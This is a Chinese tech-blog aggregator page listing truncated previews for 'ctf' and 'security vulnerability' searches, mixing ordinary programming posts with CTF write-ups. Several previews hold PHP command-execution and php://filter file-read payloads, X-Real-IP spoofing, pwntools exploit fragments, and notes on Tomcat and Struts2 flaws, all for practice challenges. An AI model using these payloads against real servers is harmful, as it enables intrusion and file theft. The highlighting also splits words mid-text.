E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
ctf安全漏洞
【微信小程序】图片自适应屏幕
mode的合法值值说明最低版本scaleToFill缩放模式,不保持纵横比缩放图片,使图片的宽高完全拉伸至填满image元素aspe
ctF
it缩放模式,保持纵横
会写代码的饭桶
·
2024-02-08 20:38
微信小程序
学习日志
实践
微信小程序
模板
前端
微信小程序
图片处理
爬虫时为什么需要代理?
但是请注意,使用代理也可能会带来一些风险,例如代理服务器可能会记录你的访问数据,或者代理服务器本身可能存在
安全漏洞
。因此,在选择代理时,请务必选择可信的、安全的代理服务提供商。
q56731523
·
2024-02-08 19:30
爬虫
网络
服务器
逗比学
CTF
.day5
BUUBURPCOURSE1比较基础的IP伪造题目,基础题get到新的知识点,通过伪造X-Real-IP字段实现本地访问一、原题无源码打开后,只提示需要本地访问。二、伪造xff一说到伪造IP地址,实现本地访问,第一想到的就是X-Forwarded-For字段但是仍然提示“只能本地访问”,服务器检测的不是xff这个字段。然后只能去问度娘X-Real-IP字段映入眼帘三、伪造X-Real-IP字段这次
名为逗比
·
2024-02-08 18:43
逗比学CTF
信息安全
175_combine-two-tables
sele
ctF
irstName,LastName,City,StatefromPersonleftouterjoinAddressonPerson.PersonId=Address.PersonId;
Twopothead
·
2024-02-08 18:45
Vue3创建项目方式及步骤
creating-a-vue-application2、使用的语句有:npminstall-g@vue/cli======之前已安装vue--version======确保版本在4.5.0以上vuecreate项目的名称选择Manuasele
ctf
eatures
一起来学计算机
·
2024-02-08 17:42
vue3.js
vue.js
javascript
前端框架
CTF
show web(命令执行29-36)
?c=eval($_GET[shy]);­=passthru('catflag.php');#逃逸过滤?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php#文件包含?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=conver
补天阁
·
2024-02-08 15:48
前端
CTFshow
web安全
CTF
show web(php命令执行 37-40)
?c=eval($_GET[shy]);­=passthru('catflag.php');#逃逸过滤?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php#文件包含?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=conver
补天阁
·
2024-02-08 15:17
前端
php
android
CTFshow
web安全
从多个基础CMS中学习代码审计
代码审计是在一个编程中对源代码旨在发现错误、
安全漏洞
或违反编程约定的项目。说人话就是找它这些代码中可能存在问题的地方,然后看它是否真的存在漏洞。
网安Dokii
·
2024-02-08 13:09
学习
网络安全
确保开发成果不被恶意篡改的最佳方式是什么?
为了确保应用程序或内容在没有
安全漏洞
或经过任何修改的情况下安全抵达终端用户,如何保证代码或文件的安全性,不被他人任意修改呢?
TrustAsia
·
2024-02-08 13:07
互联网安全
运维管理
网络安全
自动化
在windows系统搭建LVGL模拟器(codeblock工程)
2.pc_simulator_win_codeblocks工程获取仓库地址:lvgl/lv_port_win_codeblocks:WindowsPCsimulatorproje
ctf
orLVGLembeddedGUILibrary
懂IT的嵌入式工程师
·
2024-02-08 12:48
LVGL
LVGL
文件系统
lv_fs
[BUU
CTF
]-PWN:inndy_echo解析
查看保护查看ida有格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修改,免去很多麻烦完整exp:frompwnimport*p=process('./echo')p=remote('node5.buuoj.cn',25852)system_plt=0x8048400printf_got=0x804
Clxhzg
·
2024-02-08 12:33
PWN
python
开发语言
安全
网络安全
[BUU
CTF
]-PWN:wust
ctf
2020_easyfast解析
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用doublefree有两种解法解法一(doublefree):完整exp:frompwnimport*context(log_level='debug')p=process('./easyfast')target
Clxhzg
·
2024-02-08 12:33
PWN
python
开发语言
[BUU
CTF
]-PWN:a
ctf
_2019_babystack解析
先看保护再看ida原本我以为会是整数溢出,但是实际上不是。这道题考到了栈迁移,并且还给了我们栈的地址,并且正好是栈顶完整exp:frompwnimport*fromLibcSearcherimport*context(log_level='debug')p=process('./babystack')p=remote('node5.buuoj.cn',29218)leave_ret=0x400a1
Clxhzg
·
2024-02-08 12:32
PWN
网络安全
安全
[BUU
CTF
]-PWN:roar
ctf
_2019_easy_pwn解析
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块
Clxhzg
·
2024-02-08 12:02
PWN
安全
网络安全
[BUU
CTF
]-PWN:[极客大挑战 2019]Not Bad解析
保护ida这里使用mmap函数创造了一个内存映射区域从地址0x123000开始,大小位0x1000权限为可写可执行(可读0x1,可写0x2,可执行0x3)设置为私有映射(MAP_PRIVATE)和匿名映射(MAP_ANONYMOUS)常见的标志的值:MAP_SHARED:1MAP_PRIVATE:2MAP_ANONYMOUS:0x20(32)MAP_FIXED:0x10(16)MAP_LOCKED
Clxhzg
·
2024-02-08 12:01
PWN
前端
安全
网络安全
BUU
CTF
-Real-[struts2]s2-001
漏洞描述struts2漏洞S2-001是当用户提交表单数据且验证失败时,服务器使用OGNL表达式解析用户先前提交的参数值,%{value}并重新填充相应的表单数据。例如,在注册或登录页面中,如果提交失败,则服务器通常默认情况下将返回先前提交的数据。由于服务器用于%{value}对提交的数据执行OGNL表达式解析,因此服务器可以直接发送有效载荷来执行命令。漏洞poc验证经过poc验证,我们发现[st
真的学不了一点。。。
·
2024-02-08 11:37
漏洞复现与研究
java
struts
BUU
CTF
-Real-[Tomcat]CVE-2017-12615
目录漏洞描述一、漏洞编号:CVE-2017-12615二、漏洞复现getflag漏洞描述CVE-2017-12615:远程代码执行漏洞影响范围:ApacheTomcat7.0.0-7.0.79(windows环境)当Tomcat运行在Windows操作系统时,且启用了HTTPPUT请求方法(例如,将readonly初始化参数由默认值设置为false),攻击者将有可能可通过精心构造的攻击请求数据包向
真的学不了一点。。。
·
2024-02-08 11:36
漏洞复现与研究
网络安全
H
CTF
2017-Web-Writeup
boringwebsite先通过扫描得到:http://106.15.53.124:38324/www.zip";echo"flagish
ctf
{whatyouget}";error_reporting
dengzhasong7076
·
2024-02-08 10:46
php
数据库
python
mysql 查询重复数据
方法一:使用GROUPBY和HAVING子句sqlSELE
CTf
ield_name,COUNT(field_name)AScountFROMtable_nameGROUPBYfield_nameHAVINGCOUNT
华如锦
·
2024-02-08 10:13
MySQL
mysql
数据库
java
2024年2月第1周
后面开始一周一记录了本周学习:复现了cor
CTF
2023sysretbug相关的题目做了plaid
CTF
2020mojo这道沙箱逃逸题目复现了春秋杯冬季赛的两道题目,比较简单的题目简单的看了下预取侧信道攻击
XiaozaYa
·
2024-02-08 09:49
日记
日记
2024-2-1
今日学习:1)今天主要就复现了cor
CTF
2023sysruption这道题目,终于搞懂了。sysretbug是如此的美妙,但是对于侧信道攻击哪里还是有点问题,就是成功泄漏的概率比较低。
XiaozaYa
·
2024-02-08 09:48
日记
日记
Chrome 沙箱逃逸 -- Plaid
CTF
2020 mojo
MojodocsIntrotoMojo&Services译文:利用MojoIPC的UAF漏洞实现Chrome浏览器沙箱逃逸原文:CleanlyEscapingtheChromeSandbox参考文章本文主要参考Plaid
CTF
2020
XiaozaYa
·
2024-02-08 09:18
V8
chrome
mojo
沙箱逃逸
windowsserver 2016 PostgreSQL9.6.3-2升级解决其
安全漏洞
问题
PostgreSQL身份验证绕过漏洞(CVE-2017-7546)PostgreSQL输入验证错误漏洞(CVE-2019-10211)PostgreSQLadminpack扩展
安全漏洞
(CVE-2018
diaya
·
2024-02-08 08:54
postgresql
安全
数据库
kali系统搭建BlueLotus_XSSReceiver-master
1.访问GitHub-trysec/BlueLotus_XSSReceiver:XSS平台
CTF
工具Web安全工具下载BlueLotus_XSSReceiver-master2.我的kali系统已安装apache2
fengtianlei159
·
2024-02-08 07:41
安全
web安全
php
资源分享 | 利用机器学习进行高级MRI分析
A
ctf
low大脑活动流工具箱(BrainActivityFlowToolbox,简称A
ctf
low)。该工具箱有助于将大脑连接与任务诱发活动以及相关的认知和行为功能联系起来。
茗创科技
·
2024-02-08 07:11
数据分析
脑电数据分析
fMRI
核磁
经验分享
fMRI
机器学习
2022-03-16 React基础
第一个React程序函数式组件//引入react核心importRea
ctf
rom'react'//引入react对dom操作的核心,相对于react-native而言的importReactDOMfrom'react-dom
null_7d53
·
2024-02-08 07:24
探索Spring Validation:优雅实现后端数据验证的艺术
在现代Web应用开发中,数据验证是一项至关重要的任务,确保应用程序接收到的用户输入符合预期规范,不仅能够提高系统的健壮性,也能有效防止潜在的
安全漏洞
。
南 阳
·
2024-02-08 06:46
spring
java
后端
intellij
idea
论文阅读-Examining Zero-Shot Vulnerability Repair with Large Language Models
人类开发人员编写的代码可能存在网络
安全漏洞
,新兴的智能代码补全工具是否能帮助修复这些漏洞呢?
Che_Che_
·
2024-02-08 06:14
论文阅读
语言模型
人工智能
BUU [A
CTF
新生赛2020]Universe_final_answer
[A
CTF
新生赛2020]Universe_final_answer首先查壳,64bit无壳ida64位打开main()__int64__fastcallmain(inta1,char**a2,char
Eutop1a
·
2024-02-08 06:00
buuctf
reverse
ctf
安全
c语言
Rebuild企业管理系统 SSRF漏洞复现(CVE-2024-1021)
0x02漏洞概述Rebuild3.5.5版本存在
安全漏洞
,该漏洞源于组件HTTPRequestHandler的readRawText函数的url参数存在服务器端请求伪造漏洞。0x03
OidBoy_G
·
2024-02-08 05:33
漏洞复现
安全
web安全
【ESP32+Python】MQTT服务使用例子包含温感和继电器应用
1.MQTT服务推荐使用emqx2.ESP32基础库,放在目录下名称为umqttsimple.pyimportusocketassocketimportustructasstru
ctf
romubinasciiimporthexlifyclassMQTTException
淡忘_cx
·
2024-02-08 05:00
ESP32+Python
python
开发语言
小迪渗透&
CTF
夺旗&SRC挖掘(拾叁)
(83-88)演示案例:涉及资源84.PHP弱类型&异或取反&序列化&RCEPHP常考点弱类型绕过对比总结反序列化考点:网鼎杯2020-青龙组-web-AreUserialzpreg_match绕过-
ctf
hub
进击的网安攻城狮
·
2024-02-08 05:43
python
flask
pycharm
83
CTF
夺旗-Python考点SSTI&反序列化&字符串
这里写目录标题
CTF
各大题型简介演示案例:
CTF
夺旗-Python-支付逻辑&JWT&反序列化
CTF
夺旗-Python-Flask&jinja2&SSTl模版注入
CTF
夺旗-Python-格式化字符串漏洞
山兔1
·
2024-02-08 05:11
小迪安全
python
开发语言
ctF
S: Replacing File Indexing with Hardware Memory Translation through Contiguous File Allo...——泛读笔记
FAST2022Paper分布式元数据论文汇总问题持久的字节寻址内存(PM)有望在未来的计算机系统中变得普遍。与磁盘存储相比,PM的速度显着更快,并且对PM的访问受到内存管理单元(MMU)的控制,就像对易失性RAM的访问一样。这些独特的特性将性能瓶颈从I/O转移到了块地址查找的操作上,例如,在写入工作负载中,ext4-DAX中高达45%的开销是由于构建和搜索范围树以将文件偏移转换为持久内存上的地址
妙BOOK言
·
2024-02-08 03:40
论文阅读
论文阅读
文件系统
登录功能渗透测试
登录功能渗透测试登录功能的渗透测试是一种安全评估方法,用于检测Web应用程序中的登录系统是否存在
安全漏洞
。
软件测试很重要
·
2024-02-08 03:32
安全性测试
[FE] jsx没提示类型错误
1.场景复现(1)新建项目
[email protected]
(2)新建index.jsx文件import*asRea
ctf
rom'react
何幻
·
2024-02-08 03:11
源码与tarball软件安装
编译的过程中会产生目标文件(Obje
ctf
ile),这些文件是以“
夏夏LJ
·
2024-02-08 03:39
X
CTF
攻防世界MISC进阶篇题目(1-10)
1Training-Stegano-1这是我能想到的最基础的图片隐写术附件是个bmp图片,下载下来长这样一开始先用stegsolve和binwalk看了看没发现问题,然后用winhex发现有文字,“看看hex-edit提示了什么”试着提交flag{steganoI},不对,看了wp说是直接提交steganoI。。。2Test-flag-please-ignore没有题干,有一个附件,下载下来是个没
青崖牧人
·
2024-02-08 02:30
Begin
CTF
2024 RE 部分复现
8.arc上面一托混淆,左边似乎是三个东西相乘单独取出最左边一托打印,可以得到大数组接下来要解密,原代码非常混乱,我们先整理一下,简单去混淆print(all([[data][a][d]==efora,binenumerate([[int(a)forainbin(sum((ord(b)#include#defineDELTA0x9e3779b9#defineMX(((z>>5^y>3^z1){ro
Pisces50002
·
2024-02-08 01:45
c语言
python
汇编
算法
Houdini NODES
Obje
ctf
lagsDisplay是否显示Selectable是否可选中OtherObje
ctf
lags您可以通过右键单击一个节点并打开flags子菜单来设置这些标志。
zrwjsz
·
2024-02-08 00:15
Houdini
CTF
-PWN-堆-【chunk extend/overlapping-2】(hack.lu
ctf
2015 bookstore)
文章目录hack.lu
ctf
2015bookstore检查IDA源码main函数edit_notedelete_notesubmit.fini_array段劫持(回到main函数的方法)思路格式化字符串是啥呢
Full-LLK
·
2024-02-07 22:45
CTF-PWN-堆
CTF-PWN
CTF
|sqlmap的简单使用
工具BurpSuiteChrome插件ProxySwitchyOmegasqlmap示例:BugKu
CTF
题成绩单初步测试1BurpSuite开启代理,随意输入一个id,BurpSuite导出为文件image.png
小半_7a2b
·
2024-02-07 20:46
C Primer Plus(第六版)15.9 编程练习 第6题
//#include#include#includestru
ctf
ont_style{unsignedintfont_ID:8;unsignedintfont_size:7;unsignedintalignment
apple_50569014
·
2024-02-07 19:34
C
Primer
Plus(第六版)
c语言
开发语言
CTF
之web安全
web安全CSRF简介CSRF,全名CrossSiteRequestForgery,跨站请求伪造。很容易将它与XSS混淆,对于CSRF,其两个关键点是跨站点的请求与请求的伪造,由于目标站无token或referer防御,导致用户的敏感操作的每一个参数都可以被攻击者获知,攻击者即可以伪造一个完全一样的请求以用户的身份达到恶意目的。CSRF类型按请求类型,可分为GET型和POST型。按攻击方式,可分为
不胜舟-
·
2024-02-07 18:43
xss
mysql
git
php
安全
什么是网站安全? 如何对其加固防止网站被黑客攻击
近些年来,网络安全相关话题已经引起了社会的广泛关注,还记得去年暑期大火的偶像连续剧《亲爱的热爱的》讲述了男主希望为中国拿下
CTF
大赛冠军的梦想之路,
CTF
在网络安全领域中指的是网络安全技术人员之间进行技术比拼的一种比赛形式
websinesafe
·
2024-02-07 16:14
网站安全防护
如何防止网站被攻击
网站被攻击怎么解决
网站安全
如何防止网站被攻击
网站被攻击如何解决
渗透测试服务
网站安全公司
java中那些让你傻傻分不清楚的小细节
除了常规的bug和
安全漏洞
之外,还有几处方法用法错误,引起了我极大的兴趣。我为什么会对这几个方法这么感兴趣呢?因为它们极具迷惑性,可能会让我们傻傻分不清楚。1.replace会替换所有字符?
Java李太白
·
2024-02-07 16:24
Android用setRectToRect实现Bitmap基于Matrix矩阵scale缩放Re
ctF
动画,Kotlin(二)
Android用setRectToRect实现Bitmap基于Matrix矩阵scale缩放Re
ctF
动画,Kotlin(二)文章https://zhangphil.blog.csdn.net/article
zhangphil
·
2024-02-07 14:44
kotlin
Android
android
kotlin
useSelector useDispatch
1.form.jsimportRea
ctf
rom'react'import{useSelector,useDispatch}from'react-redux'import{updateTel,updateName
penelope_2bad
·
2024-02-07 14:09
oracle rac 增加实例,ORACLE 11GRAC配置单实例ADG
主库和备库:操作系统:Liunx6.5数据库版本:11.2.0.4创建步骤:一.主库配置1.设置为forcelogging模式SQL>alterdatabaseforcelogging;验证SQL>sele
ctf
orce_loggingfromv
weixin_39630880
·
2024-02-07 14:34
oracle
rac
增加实例
[SWPU
CTF
2021 新生赛]no_wakeup
我们可以看到这是一道反序列化的题目但是有他有个wakeup我们需要绕过不然unserialize()会执行里面sha1不可逆加密算法我们只需要在O:6:“HaHaHa”:2:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;}多添加一个属性即可O:6:“HaHaHa”:3:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s
Ryongao
·
2024-02-07 13:36
NSSCTF
网络安全
ctf
NSSCTF
上一页
6
7
8
9
10
11
12
13
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他